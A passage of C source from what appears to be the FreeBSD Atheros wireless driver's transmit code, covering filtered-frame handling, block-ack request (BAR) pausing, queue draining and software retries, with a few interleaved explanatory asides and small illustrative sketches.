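The pause/resume pair above is reference-counted because several independent conditions (a pending BAR, filtered frames, cleanup) can each pause a TID. A minimal sketch of that discipline, as an illustration rather than the driver's locking or scheduling:

/* Nested pause count for one TID. */
struct tid_state {
	int	paused;
};

static void
tid_pause(struct tid_state *t)
{
	t->paused++;
}

/* Returns 1 when every pause has been matched and TX may resume. */
static int
tid_resume(struct tid_state *t)
{
	if (t->paused > 0)
		t->paused--;
	return (t->paused == 0);
}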
*/ static void ath_tx_tid_filt_comp_complete(struct ath_softc *sc, struct ath_tid *tid) { struct ath_buf *bf; ATH_TX_LOCK_ASSERT(sc); if (tid->hwq_depth != 0) return; DPRINTF(sc, ATH_DEBUG_SW_TX_FILT, "%s: hwq=0, transition back\n", __func__); tid->isfiltered = 0; /* XXX ath_tx_tid_resume() also calls ath_tx_set_clrdmask()! */ ath_tx_set_clrdmask(sc, tid->an); /* XXX this is really quite inefficient */ while ((bf = ATH_TID_FILT_LAST(tid, ath_bufhead_s)) != NULL) { ATH_TID_FILT_REMOVE(tid, bf, bf_list); ATH_TID_INSERT_HEAD(tid, bf, bf_list); } ath_tx_tid_resume(sc, tid); } /* * Called when a single (aggregate or otherwise) frame is completed. * * Returns 1 if the buffer could be added to the filtered list * (cloned or otherwise), 0 if the buffer couldn't be added to the * filtered list (failed clone; expired retry) and the caller should * free it and handle it like a failure (eg by sending a BAR.) */ static int ath_tx_tid_filt_comp_single(struct ath_softc *sc, struct ath_tid *tid, struct ath_buf *bf) { struct ath_buf *nbf; int retval; ATH_TX_LOCK_ASSERT(sc); /* * Don't allow a filtered frame to live forever. */ if (bf->bf_state.bfs_retries > SWMAX_RETRIES) { sc->sc_stats.ast_tx_swretrymax++; DPRINTF(sc, ATH_DEBUG_SW_TX_FILT, "%s: bf=%p, seqno=%d, exceeded retries\n", __func__, bf, bf->bf_state.bfs_seqno); return (0); } /* * A busy buffer can't be added to the retry list. * It needs to be cloned. */ if (bf->bf_flags & ATH_BUF_BUSY) { nbf = ath_tx_retry_clone(sc, tid->an, tid, bf); DPRINTF(sc, ATH_DEBUG_SW_TX_FILT, "%s: busy buffer clone: %p -> %p\n", __func__, bf, nbf); } else { nbf = bf; } if (nbf == NULL) { DPRINTF(sc, ATH_DEBUG_SW_TX_FILT, "%s: busy buffer couldn't be cloned (%p)!\n", __func__, bf); retval = 1; } else { ath_tx_tid_filt_comp_buf(sc, tid, nbf); retval = 0; } ath_tx_tid_filt_comp_complete(sc, tid); return (retval); } static void ath_tx_tid_filt_comp_aggr(struct ath_softc *sc, struct ath_tid *tid, struct ath_buf *bf_first, ath_bufhead *bf_q) { struct ath_buf *bf, *bf_next, *nbf; ATH_TX_LOCK_ASSERT(sc); bf = bf_first; while (bf) { bf_next = bf->bf_next; bf->bf_next = NULL; /* Remove it from the aggr list */ /* * Don't allow a filtered frame to live forever. */ if (bf->bf_state.bfs_retries > SWMAX_RETRIES) { sc->sc_stats.ast_tx_swretrymax++; DPRINTF(sc, ATH_DEBUG_SW_TX_FILT, "%s: bf=%p, seqno=%d, exceeded retries\n", __func__, bf, bf->bf_state.bfs_seqno); TAILQ_INSERT_TAIL(bf_q, bf, bf_list); goto next; } if (bf->bf_flags & ATH_BUF_BUSY) { nbf = ath_tx_retry_clone(sc, tid->an, tid, bf); DPRINTF(sc, ATH_DEBUG_SW_TX_FILT, "%s: busy buffer cloned: %p -> %p", __func__, bf, nbf); } else { nbf = bf; } /* * If the buffer couldn't be cloned, add it to bf_q; * the caller will free the buffer(s) as required. */ if (nbf == NULL) { DPRINTF(sc, ATH_DEBUG_SW_TX_FILT, "%s: buffer couldn't be cloned! (%p)\n", __func__, bf); TAILQ_INSERT_TAIL(bf_q, bf, bf_list); } else { ath_tx_tid_filt_comp_buf(sc, tid, nbf); } next: bf = bf_next; } ath_tx_tid_filt_comp_complete(sc, tid); } /* * Suspend the queue because we need to TX a BAR. */ static void ath_tx_tid_bar_suspend(struct ath_softc *sc, struct ath_tid *tid) { ATH_TX_LOCK_ASSERT(sc); DPRINTF(sc, ATH_DEBUG_SW_TX_BAR, "%s: tid=%d, bar_wait=%d, bar_tx=%d, called\n", __func__, tid->tid, tid->bar_wait, tid->bar_tx); /* We shouldn't be called when bar_tx is 1 */ if (tid->bar_tx) { DPRINTF(sc, ATH_DEBUG_SW_TX_BAR, "%s: bar_tx is 1?!\n", __func__); } /* If we've already been called, just be patient. */ if (tid->bar_wait) return; /* Wait! 
*/ tid->bar_wait = 1; /* Only one pause, no matter how many frames fail */ ath_tx_tid_pause(sc, tid); } /* * We've finished with BAR handling - either we succeeded or * failed. Either way, unsuspend TX. */ static void ath_tx_tid_bar_unsuspend(struct ath_softc *sc, struct ath_tid *tid) { ATH_TX_LOCK_ASSERT(sc); DPRINTF(sc, ATH_DEBUG_SW_TX_BAR, "%s: %6D: TID=%d, called\n", __func__, tid->an->an_node.ni_macaddr, ":", tid->tid); if (tid->bar_tx == 0 || tid->bar_wait == 0) { DPRINTF(sc, ATH_DEBUG_SW_TX_BAR, "%s: %6D: TID=%d, bar_tx=%d, bar_wait=%d: ?\n", __func__, tid->an->an_node.ni_macaddr, ":", tid->tid, tid->bar_tx, tid->bar_wait); } tid->bar_tx = tid->bar_wait = 0; ath_tx_tid_resume(sc, tid); } /* * Return whether we're ready to TX a BAR frame. * * Requires the TID lock be held. */ static int ath_tx_tid_bar_tx_ready(struct ath_softc *sc, struct ath_tid *tid) { ATH_TX_LOCK_ASSERT(sc); if (tid->bar_wait == 0 || tid->hwq_depth > 0) return (0); DPRINTF(sc, ATH_DEBUG_SW_TX_BAR, "%s: %6D: TID=%d, bar ready\n", __func__, tid->an->an_node.ni_macaddr, ":", tid->tid); return (1); } /* * Check whether the current TID is ready to have a BAR * TXed and if so, do the TX. * * Since the TID/TXQ lock can't be held during a call to * ieee80211_send_bar(), we have to do the dirty thing of unlocking it, * sending the BAR and locking it again. * * Eventually, the code to send the BAR should be broken out * from this routine so the lock doesn't have to be reacquired * just to be immediately dropped by the caller. */ static void ath_tx_tid_bar_tx(struct ath_softc *sc, struct ath_tid *tid) { struct ieee80211_tx_ampdu *tap; ATH_TX_LOCK_ASSERT(sc); DPRINTF(sc, ATH_DEBUG_SW_TX_BAR, "%s: %6D: TID=%d, called\n", __func__, tid->an->an_node.ni_macaddr, ":", tid->tid); tap = ath_tx_get_tx_tid(tid->an, tid->tid); /* * This is an error condition! */ if (tid->bar_wait == 0 || tid->bar_tx == 1) { DPRINTF(sc, ATH_DEBUG_SW_TX_BAR, "%s: %6D: TID=%d, bar_tx=%d, bar_wait=%d: ?\n", __func__, tid->an->an_node.ni_macaddr, ":", tid->tid, tid->bar_tx, tid->bar_wait); return; } /* Don't do anything if we still have pending frames */ if (tid->hwq_depth > 0) { DPRINTF(sc, ATH_DEBUG_SW_TX_BAR, "%s: %6D: TID=%d, hwq_depth=%d, waiting\n", __func__, tid->an->an_node.ni_macaddr, ":", tid->tid, tid->hwq_depth); return; } /* We're now about to TX */ tid->bar_tx = 1; /* * Override the clrdmask configuration for the next frame, * just to get the ball rolling. */ ath_tx_set_clrdmask(sc, tid->an); /* * Calculate new BAW left edge, now that all frames have either * succeeded or failed. * * XXX verify this is _actually_ the valid value to begin at! */ DPRINTF(sc, ATH_DEBUG_SW_TX_BAR, "%s: %6D: TID=%d, new BAW left edge=%d\n", __func__, tid->an->an_node.ni_macaddr, ":", tid->tid, tap->txa_start); /* Try sending the BAR frame */ /* We can't hold the lock here! */ ATH_TX_UNLOCK(sc); if (ieee80211_send_bar(&tid->an->an_node, tap, tap->txa_start) == 0) { /* Success? Now we wait for notification that it's done */ ATH_TX_LOCK(sc); return; } /* Failure? For now, warn loudly and continue */ ATH_TX_LOCK(sc); DPRINTF(sc, ATH_DEBUG_SW_TX_BAR, "%s: %6D: TID=%d, failed to TX BAR, continue!\n", __func__, tid->an->an_node.ni_macaddr, ":", tid->tid); ath_tx_tid_bar_unsuspend(sc, tid); } static void ath_tx_tid_drain_pkt(struct ath_softc *sc, struct ath_node *an, struct ath_tid *tid, ath_bufhead *bf_cq, struct ath_buf *bf) { ATH_TX_LOCK_ASSERT(sc); /* * If the current TID is running AMPDU, update * the BAW. 
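The BAR gating above waits for the hardware queue to empty so the new block-ack window left edge is final before the BAR goes out. A sketch of that readiness check, with a stand-in structure that mirrors the fields used above:

struct bar_state {
	int	bar_wait;	/* a BAR has been requested */
	int	hwq_depth;	/* frames still on the hardware queue */
};

/* Ready to TX the BAR only once requested and nothing is in flight. */
static int
bar_ready(const struct bar_state *b)
{
	return (b->bar_wait != 0 && b->hwq_depth == 0);
}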
*/ if (ath_tx_ampdu_running(sc, an, tid->tid) && bf->bf_state.bfs_dobaw) { /* * Only remove the frame from the BAW if it's * been transmitted at least once; this means * the frame was in the BAW to begin with. */ if (bf->bf_state.bfs_retries > 0) { ath_tx_update_baw(sc, an, tid, bf); bf->bf_state.bfs_dobaw = 0; } #if 0 /* * This has become a non-fatal error now */ if (! bf->bf_state.bfs_addedbaw) DPRINTF(sc, ATH_DEBUG_SW_TX_BAW "%s: wasn't added: seqno %d\n", __func__, SEQNO(bf->bf_state.bfs_seqno)); #endif } /* Strip it out of an aggregate list if it was in one */ bf->bf_next = NULL; /* Insert on the free queue to be freed by the caller */ TAILQ_INSERT_TAIL(bf_cq, bf, bf_list); } static void ath_tx_tid_drain_print(struct ath_softc *sc, struct ath_node *an, const char *pfx, struct ath_tid *tid, struct ath_buf *bf) { struct ieee80211_node *ni = &an->an_node; struct ath_txq *txq; struct ieee80211_tx_ampdu *tap; txq = sc->sc_ac2q[tid->ac]; tap = ath_tx_get_tx_tid(an, tid->tid); DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: %s: %6D: bf=%p: addbaw=%d, dobaw=%d, " "seqno=%d, retry=%d\n", __func__, pfx, ni->ni_macaddr, ":", bf, bf->bf_state.bfs_addedbaw, bf->bf_state.bfs_dobaw, SEQNO(bf->bf_state.bfs_seqno), bf->bf_state.bfs_retries); DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: %s: %6D: bf=%p: txq[%d] axq_depth=%d, axq_aggr_depth=%d\n", __func__, pfx, ni->ni_macaddr, ":", bf, txq->axq_qnum, txq->axq_depth, txq->axq_aggr_depth); DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: %s: %6D: bf=%p: tid txq_depth=%d hwq_depth=%d, bar_wait=%d, " "isfiltered=%d\n", __func__, pfx, ni->ni_macaddr, ":", bf, tid->axq_depth, tid->hwq_depth, tid->bar_wait, tid->isfiltered); DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: %s: %6D: tid %d: " "sched=%d, paused=%d, " "incomp=%d, baw_head=%d, " "baw_tail=%d txa_start=%d, ni_txseqs=%d\n", __func__, pfx, ni->ni_macaddr, ":", tid->tid, tid->sched, tid->paused, tid->incomp, tid->baw_head, tid->baw_tail, tap == NULL ? -1 : tap->txa_start, ni->ni_txseqs[tid->tid]); /* XXX Dump the frame, see what it is? */ ieee80211_dump_pkt(ni->ni_ic, mtod(bf->bf_m, const uint8_t *), bf->bf_m->m_len, 0, -1); } /* * Free any packets currently pending in the software TX queue. * * This will be called when a node is being deleted. * * It can also be called on an active node during an interface * reset or state transition. * * (From Linux/reference): * * TODO: For frame(s) that are in the retry state, we will reuse the * sequence number(s) without setting the retry bit. The * alternative is to give up on these and BAR the receiver's window * forward. */ static void ath_tx_tid_drain(struct ath_softc *sc, struct ath_node *an, struct ath_tid *tid, ath_bufhead *bf_cq) { struct ath_buf *bf; struct ieee80211_tx_ampdu *tap; struct ieee80211_node *ni = &an->an_node; int t; tap = ath_tx_get_tx_tid(an, tid->tid); ATH_TX_LOCK_ASSERT(sc); /* Walk the queue, free frames */ t = 0; for (;;) { bf = ATH_TID_FIRST(tid); if (bf == NULL) { break; } if (t == 0) { ath_tx_tid_drain_print(sc, an, "norm", tid, bf); t = 1; } ATH_TID_REMOVE(tid, bf, bf_list); ath_tx_tid_drain_pkt(sc, an, tid, bf_cq, bf); } /* And now, drain the filtered frame queue */ t = 0; for (;;) { bf = ATH_TID_FILT_FIRST(tid); if (bf == NULL) break; if (t == 0) { ath_tx_tid_drain_print(sc, an, "filt", tid, bf); t = 1; } ATH_TID_FILT_REMOVE(tid, bf, bf_list); ath_tx_tid_drain_pkt(sc, an, tid, bf_cq, bf); } /* * Override the clrdmask configuration for the next frame * in case there is some future transmission, just to get * the ball rolling. 
 *
 * This won't hurt things if the TID is about to be freed.
 */
	ath_tx_set_clrdmask(sc, tid->an);

	/*
	 * Now that it's completed, grab the TID lock and update
	 * the sequence number and BAW window.
	 * Because sequence numbers have been assigned to frames
	 * that haven't been sent yet, it's entirely possible
	 * we'll be called with some pending frames that have not
	 * been transmitted.
	 *
	 * The cleaner solution is to do the sequence number allocation
	 * when the packet is first transmitted - and thus the "retries"
	 * check above would be enough to update the BAW/seqno.
	 */

	/* But don't do it for non-QoS TIDs */
	if (tap) {
#if 1
		DPRINTF(sc, ATH_DEBUG_SW_TX_CTRL,
		    "%s: %6D: node %p: TID %d: sliding BAW left edge to %d\n",
		    __func__, ni->ni_macaddr, ":", an, tid->tid,
		    tap->txa_start);
#endif
		ni->ni_txseqs[tid->tid] = tap->txa_start;
		tid->baw_tail = tid->baw_head;
	}
}

/*
 * Reset the TID state.  This must only be called once the node has
 * had its frames flushed from this TID, to ensure that no other
 * pause / unpause logic can kick in.
 */
static void
ath_tx_tid_reset(struct ath_softc *sc, struct ath_tid *tid)
{
#if 0
	tid->bar_wait = tid->bar_tx = tid->isfiltered = 0;
	tid->paused = tid->sched = tid->addba_tx_pending = 0;
	tid->incomp = tid->cleanup_inprogress = 0;
#endif

	/*
	 * If we have a bar_wait set, we need to unpause the TID
	 * here.  Otherwise once cleanup has finished, the TID won't
	 * have the right paused counter.
	 *
	 * XXX I'm not going through resume here - I don't want the
	 * node to be rescheduled just yet.  This however should be
	 * methodized!
	 */
	if (tid->bar_wait) {
		if (tid->paused > 0) {
			tid->paused--;
		}
	}

	/*
	 * XXX same with a currently filtered TID.
	 *
	 * Since this is being called during a flush, we assume that
	 * the filtered frame list is actually empty.
	 *
	 * XXX TODO: add in a check to ensure that the filtered queue
	 * depth is actually 0!
	 */
	if (tid->isfiltered) {
		if (tid->paused > 0) {
			tid->paused--;
		}
	}

	/*
	 * Clear BAR, filtered frames, scheduled and ADDBA pending.
	 * The TID may be going through cleanup from the last association
	 * where things in the BAW are still in the hardware queue.
	 */
	tid->bar_wait = 0;
	tid->bar_tx = 0;
	tid->isfiltered = 0;
	tid->sched = 0;
	tid->addba_tx_pending = 0;

	/*
	 * XXX TODO: it may just be enough to walk the HWQs and mark
	 * frames for that node as non-aggregate; or mark the ath_node
	 * with something that indicates that aggregation is no longer
	 * occurring.  Then we can just toss the BAW complaints and
	 * do a complete hard reset of state here - no pause, no
	 * complete counter, etc.
	 */
}

/*
 * Flush all software queued packets for the given node.
 *
 * This occurs when a completion handler frees the last buffer
 * for a node, and the node is thus freed.  This causes the node
 * to be cleaned up, which ends up calling ath_tx_node_flush.
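The flush routines that follow all use the same pattern: move buffers onto a local completion list while the TX lock is held, then run the completion handlers after the lock is dropped. A generic standalone sketch of that pattern (stand-in types, with the locking shown only as comments):

#include <sys/queue.h>

struct pkt {
	TAILQ_ENTRY(pkt) link;
};
TAILQ_HEAD(pktlist, pkt);

static void
drain_and_complete(struct pktlist *swq, void (*complete)(struct pkt *))
{
	struct pktlist done;
	struct pkt *p;

	TAILQ_INIT(&done);

	/* lock(); */
	while ((p = TAILQ_FIRST(swq)) != NULL) {
		TAILQ_REMOVE(swq, p, link);
		TAILQ_INSERT_TAIL(&done, p, link);
	}
	/* unlock(); */

	/* Completions may be heavyweight; run them without the lock. */
	while ((p = TAILQ_FIRST(&done)) != NULL) {
		TAILQ_REMOVE(&done, p, link);
		complete(p);
	}
}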
*/ void ath_tx_node_flush(struct ath_softc *sc, struct ath_node *an) { int tid; ath_bufhead bf_cq; struct ath_buf *bf; TAILQ_INIT(&bf_cq); ATH_KTR(sc, ATH_KTR_NODE, 1, "ath_tx_node_flush: flush node; ni=%p", &an->an_node); ATH_TX_LOCK(sc); DPRINTF(sc, ATH_DEBUG_NODE, "%s: %6D: flush; is_powersave=%d, stack_psq=%d, tim=%d, " "swq_depth=%d, clrdmask=%d, leak_count=%d\n", __func__, an->an_node.ni_macaddr, ":", an->an_is_powersave, an->an_stack_psq, an->an_tim_set, an->an_swq_depth, an->clrdmask, an->an_leak_count); for (tid = 0; tid < IEEE80211_TID_SIZE; tid++) { struct ath_tid *atid = &an->an_tid[tid]; /* Free packets */ ath_tx_tid_drain(sc, an, atid, &bf_cq); /* Remove this tid from the list of active tids */ ath_tx_tid_unsched(sc, atid); /* Reset the per-TID pause, BAR, etc state */ ath_tx_tid_reset(sc, atid); } /* * Clear global leak count */ an->an_leak_count = 0; ATH_TX_UNLOCK(sc); /* Handle completed frames */ while ((bf = TAILQ_FIRST(&bf_cq)) != NULL) { TAILQ_REMOVE(&bf_cq, bf, bf_list); ath_tx_default_comp(sc, bf, 0); } } /* * Drain all the software TXQs currently with traffic queued. */ void ath_tx_txq_drain(struct ath_softc *sc, struct ath_txq *txq) { struct ath_tid *tid; ath_bufhead bf_cq; struct ath_buf *bf; TAILQ_INIT(&bf_cq); ATH_TX_LOCK(sc); /* * Iterate over all active tids for the given txq, * flushing and unsched'ing them */ while (! TAILQ_EMPTY(&txq->axq_tidq)) { tid = TAILQ_FIRST(&txq->axq_tidq); ath_tx_tid_drain(sc, tid->an, tid, &bf_cq); ath_tx_tid_unsched(sc, tid); } ATH_TX_UNLOCK(sc); while ((bf = TAILQ_FIRST(&bf_cq)) != NULL) { TAILQ_REMOVE(&bf_cq, bf, bf_list); ath_tx_default_comp(sc, bf, 0); } } /* * Handle completion of non-aggregate session frames. * * This (currently) doesn't implement software retransmission of * non-aggregate frames! * * Software retransmission of non-aggregate frames needs to obey * the strict sequence number ordering, and drop any frames that * will fail this. * * For now, filtered frames and frame transmission will cause * all kinds of issues. So we don't support them. * * So anyone queuing frames via ath_tx_normal_xmit() or * ath_tx_hw_queue_norm() must override and set CLRDMASK. */ void ath_tx_normal_comp(struct ath_softc *sc, struct ath_buf *bf, int fail) { struct ieee80211_node *ni = bf->bf_node; struct ath_node *an = ATH_NODE(ni); int tid = bf->bf_state.bfs_tid; struct ath_tid *atid = &an->an_tid[tid]; struct ath_tx_status *ts = &bf->bf_status.ds_txstat; /* The TID state is protected behind the TXQ lock */ ATH_TX_LOCK(sc); DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: bf=%p: fail=%d, hwq_depth now %d\n", __func__, bf, fail, atid->hwq_depth - 1); atid->hwq_depth--; #if 0 /* * If the frame was filtered, stick it on the filter frame * queue and complain about it. It shouldn't happen! */ if ((ts->ts_status & HAL_TXERR_FILT) || (ts->ts_status != 0 && atid->isfiltered)) { DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: isfiltered=%d, ts_status=%d: huh?\n", __func__, atid->isfiltered, ts->ts_status); ath_tx_tid_filt_comp_buf(sc, atid, bf); } #endif if (atid->isfiltered) DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: filtered?!\n", __func__); if (atid->hwq_depth < 0) DPRINTF(sc, ATH_DEBUG_SW_TX, "%s: hwq_depth < 0: %d\n", __func__, atid->hwq_depth); /* * If the queue is filtered, potentially mark it as complete * and reschedule it as needed. * * This is required as there may be a subsequent TX descriptor * for this end-node that has CLRDMASK set, so it's quite possible * that a filtered frame will be followed by a non-filtered * (complete or otherwise) frame. 
* * XXX should we do this before we complete the frame? */ if (atid->isfiltered) ath_tx_tid_filt_comp_complete(sc, atid); ATH_TX_UNLOCK(sc); /* * punt to rate control if we're not being cleaned up * during a hw queue drain and the frame wanted an ACK. */ if (fail == 0 && ((bf->bf_state.bfs_txflags & HAL_TXDESC_NOACK) == 0)) ath_tx_update_ratectrl(sc, ni, bf->bf_state.bfs_rc, ts, bf->bf_state.bfs_pktlen, 1, (ts->ts_status == 0) ? 0 : 1); ath_tx_default_comp(sc, bf, fail); } /* * Handle cleanup of aggregate session packets that aren't * an A-MPDU. * * There's no need to update the BAW here - the session is being * torn down. */ static void ath_tx_comp_cleanup_unaggr(struct ath_softc *sc, struct ath_buf *bf) { struct ieee80211_node *ni = bf->bf_node; struct ath_node *an = ATH_NODE(ni); int tid = bf->bf_state.bfs_tid; struct ath_tid *atid = &an->an_tid[tid]; DPRINTF(sc, ATH_DEBUG_SW_TX_CTRL, "%s: TID %d: incomp=%d\n", __func__, tid, atid->incomp); ATH_TX_LOCK(sc); atid->incomp--; if (atid->incomp == 0) { DPRINTF(sc, ATH_DEBUG_SW_TX_CTRL, "%s: TID %d: cleaned up! resume!\n", __func__, tid); atid->cleanup_inprogress = 0; ath_tx_tid_resume(sc, atid); } ATH_TX_UNLOCK(sc); ath_tx_default_comp(sc, bf, 0); } /* * Performs transmit side cleanup when TID changes from aggregated to * unaggregated. * * - Discard all retry frames from the s/w queue. * - Fix the tx completion function for all buffers in s/w queue. * - Count the number of unacked frames, and let transmit completion * handle it later. * * The caller is responsible for pausing the TID and unpausing the * TID if no cleanup was required. Otherwise the cleanup path will * unpause the TID once the last hardware queued frame is completed. */ static void ath_tx_tid_cleanup(struct ath_softc *sc, struct ath_node *an, int tid, ath_bufhead *bf_cq) { struct ath_tid *atid = &an->an_tid[tid]; struct ieee80211_tx_ampdu *tap; struct ath_buf *bf, *bf_next; ATH_TX_LOCK_ASSERT(sc); DPRINTF(sc, ATH_DEBUG_SW_TX_BAW, "%s: TID %d: called\n", __func__, tid); /* * Move the filtered frames to the TX queue, before * we run off and discard/process things. */ /* XXX this is really quite inefficient */ while ((bf = ATH_TID_FILT_LAST(atid, ath_bufhead_s)) != NULL) { ATH_TID_FILT_REMOVE(atid, bf, bf_list); ATH_TID_INSERT_HEAD(atid, bf, bf_list); } /* * Update the frames in the software TX queue: * * + Discard retry frames in the queue * + Fix the completion function to be non-aggregate */ bf = ATH_TID_FIRST(atid); while (bf) { if (bf->bf_state.bfs_isretried) { bf_next = TAILQ_NEXT(bf, bf_list); ATH_TID_REMOVE(atid, bf, bf_list); if (bf->bf_state.bfs_dobaw) { ath_tx_update_baw(sc, an, atid, bf); if (!bf->bf_state.bfs_addedbaw) DPRINTF(sc, ATH_DEBUG_SW_TX_BAW, "%s: wasn't added: seqno %d\n", __func__, SEQNO(bf->bf_state.bfs_seqno)); } bf->bf_state.bfs_dobaw = 0; /* * Call the default completion handler with "fail" just * so upper levels are suitably notified about this. */ TAILQ_INSERT_TAIL(bf_cq, bf, bf_list); bf = bf_next; continue; } /* Give these the default completion handler */ bf->bf_comp = ath_tx_normal_comp; bf = TAILQ_NEXT(bf, bf_list); } /* * Calculate what hardware-queued frames exist based * on the current BAW size. Ie, what frames have been * added to the TX hardware queue for this TID but * not yet ACKed. 
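(Aside: the cleanup loop above walks the software TX queue with manual next-pointer bookkeeping so that already-retried frames can be unlinked mid-walk. A short sketch of the same idiom using FreeBSD's TAILQ_FOREACH_SAFE, which caches the next pointer so removal during traversal is safe; the frame type and field names here are hypothetical.)

#include <sys/queue.h>
#include <stdio.h>

struct frame {
        int seqno;
        int retried;                    /* 1 if this frame had been software-retried */
        TAILQ_ENTRY(frame) link;
};
TAILQ_HEAD(framehead, frame);

/*
 * Walk a queue and unlink the already-retried entries, keeping the rest.
 * TAILQ_FOREACH_SAFE caches the next pointer, so removing the current
 * entry does not break the traversal.
 */
static void
drop_retried(struct framehead *q, struct framehead *discard)
{
        struct frame *f, *fnext;

        TAILQ_FOREACH_SAFE(f, q, link, fnext) {
                if (f->retried) {
                        TAILQ_REMOVE(q, f, link);
                        TAILQ_INSERT_TAIL(discard, f, link);
                }
        }
}

int
main(void)
{
        struct framehead q = TAILQ_HEAD_INITIALIZER(q);
        struct framehead discard = TAILQ_HEAD_INITIALIZER(discard);
        struct frame a = { .seqno = 10, .retried = 0 };
        struct frame b = { .seqno = 11, .retried = 1 };
        struct frame *f;

        TAILQ_INSERT_TAIL(&q, &a, link);
        TAILQ_INSERT_TAIL(&q, &b, link);

        drop_retried(&q, &discard);

        TAILQ_FOREACH(f, &q, link)
                printf("kept seqno %d\n", f->seqno);    /* only seqno 10 remains */
        return (0);
}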
*/ tap = ath_tx_get_tx_tid(an, tid); /* Need the lock - fiddling with BAW */ while (atid->baw_head != atid->baw_tail) { if (atid->tx_buf[atid->baw_head]) { atid->incomp++; atid->cleanup_inprogress = 1; atid->tx_buf[atid->baw_head] = NULL; } INCR(atid->baw_head, ATH_TID_MAX_BUFS); INCR(tap->txa_start, IEEE80211_SEQ_RANGE); } if (atid->cleanup_inprogress) DPRINTF(sc, ATH_DEBUG_SW_TX_CTRL, "%s: TID %d: cleanup needed: %d packets\n", __func__, tid, atid->incomp); /* Owner now must free completed frames */ } static struct ath_buf * ath_tx_retry_clone(struct ath_softc *sc, struct ath_node *an, struct ath_tid *tid, struct ath_buf *bf) { struct ath_buf *nbf; int error; /* * Clone the buffer. This will handle the dma unmap and * copy the node reference to the new buffer. If this * works out, 'bf' will have no DMA mapping, no mbuf * pointer and no node reference. */ nbf = ath_buf_clone(sc, bf); #if 0 DPRINTF(sc, ATH_DEBUG_XMIT, "%s: ATH_BUF_BUSY; cloning\n", __func__); #endif if (nbf == NULL) { /* Failed to clone */ DPRINTF(sc, ATH_DEBUG_XMIT, "%s: failed to clone a busy buffer\n", __func__); return NULL; } /* Setup the dma for the new buffer */ error = ath_tx_dmasetup(sc, nbf, nbf->bf_m); if (error != 0) { DPRINTF(sc, ATH_DEBUG_XMIT, "%s: failed to setup dma for clone\n", __func__); /* * Put this at the head of the list, not tail; * that way it doesn't interfere with the * busy buffer logic (which uses the tail of * the list.) */ ATH_TXBUF_LOCK(sc); ath_returnbuf_head(sc, nbf); ATH_TXBUF_UNLOCK(sc); return NULL; } /* Update BAW if required, before we free the original buf */ if (bf->bf_state.bfs_dobaw) ath_tx_switch_baw_buf(sc, an, tid, bf, nbf); /* Free original buffer; return new buffer */ ath_freebuf(sc, bf); return nbf; } /* * Handle retrying an unaggregate frame in an aggregate * session. * * If too many retries occur, pause the TID, wait for * any further retransmits (as there's no reason why * non-aggregate frames in an aggregate session are * transmitted in-order; they just have to be in-BAW) * and then queue a BAR. */ static void ath_tx_aggr_retry_unaggr(struct ath_softc *sc, struct ath_buf *bf) { struct ieee80211_node *ni = bf->bf_node; struct ath_node *an = ATH_NODE(ni); int tid = bf->bf_state.bfs_tid; struct ath_tid *atid = &an->an_tid[tid]; struct ieee80211_tx_ampdu *tap; ATH_TX_LOCK(sc); tap = ath_tx_get_tx_tid(an, tid); /* * If the buffer is marked as busy, we can't directly * reuse it. Instead, try to clone the buffer. * If the clone is successful, recycle the old buffer. * If the clone is unsuccessful, set bfs_retries to max * to force the next bit of code to free the buffer * for us. */ if ((bf->bf_state.bfs_retries < SWMAX_RETRIES) && (bf->bf_flags & ATH_BUF_BUSY)) { struct ath_buf *nbf; nbf = ath_tx_retry_clone(sc, an, atid, bf); if (nbf) /* bf has been freed at this point */ bf = nbf; else bf->bf_state.bfs_retries = SWMAX_RETRIES + 1; } if (bf->bf_state.bfs_retries >= SWMAX_RETRIES) { DPRINTF(sc, ATH_DEBUG_SW_TX_RETRIES, "%s: exceeded retries; seqno %d\n", __func__, SEQNO(bf->bf_state.bfs_seqno)); sc->sc_stats.ast_tx_swretrymax++; /* Update BAW anyway */ if (bf->bf_state.bfs_dobaw) { ath_tx_update_baw(sc, an, atid, bf); if (! 
bf->bf_state.bfs_addedbaw) DPRINTF(sc, ATH_DEBUG_SW_TX_BAW, "%s: wasn't added: seqno %d\n", __func__, SEQNO(bf->bf_state.bfs_seqno)); } bf->bf_state.bfs_dobaw = 0; /* Suspend the TX queue and get ready to send the BAR */ ath_tx_tid_bar_suspend(sc, atid); /* Send the BAR if there are no other frames waiting */ if (ath_tx_tid_bar_tx_ready(sc, atid)) ath_tx_tid_bar_tx(sc, atid); ATH_TX_UNLOCK(sc); /* Free buffer, bf is free after this call */ ath_tx_default_comp(sc, bf, 0); return; } /* * This increments the retry counter as well as * sets the retry flag in the ath_buf and packet * body. */ ath_tx_set_retry(sc, bf); sc->sc_stats.ast_tx_swretries++; /* * Insert this at the head of the queue, so it's * retried before any current/subsequent frames. */ ATH_TID_INSERT_HEAD(atid, bf, bf_list); ath_tx_tid_sched(sc, atid); /* Send the BAR if there are no other frames waiting */ if (ath_tx_tid_bar_tx_ready(sc, atid)) ath_tx_tid_bar_tx(sc, atid); ATH_TX_UNLOCK(sc); } /* * Common code for aggregate excessive retry/subframe retry. * If retrying, queues buffers to bf_q. If not, frees the * buffers. * * XXX should unify this with ath_tx_aggr_retry_unaggr() */ static int ath_tx_retry_subframe(struct ath_softc *sc, struct ath_buf *bf, ath_bufhead *bf_q) { struct ieee80211_node *ni = bf->bf_node; struct ath_node *an = ATH_NODE(ni); int tid = bf->bf_state.bfs_tid; struct ath_tid *atid = &an->an_tid[tid]; ATH_TX_LOCK_ASSERT(sc); /* XXX clr11naggr should be done for all subframes */ ath_hal_clr11n_aggr(sc->sc_ah, bf->bf_desc); ath_hal_set11nburstduration(sc->sc_ah, bf->bf_desc, 0); /* ath_hal_set11n_virtualmorefrag(sc->sc_ah, bf->bf_desc, 0); */ /* * If the buffer is marked as busy, we can't directly * reuse it. Instead, try to clone the buffer. * If the clone is successful, recycle the old buffer. * If the clone is unsuccessful, set bfs_retries to max * to force the next bit of code to free the buffer * for us. */ if ((bf->bf_state.bfs_retries < SWMAX_RETRIES) && (bf->bf_flags & ATH_BUF_BUSY)) { struct ath_buf *nbf; nbf = ath_tx_retry_clone(sc, an, atid, bf); if (nbf) /* bf has been freed at this point */ bf = nbf; else 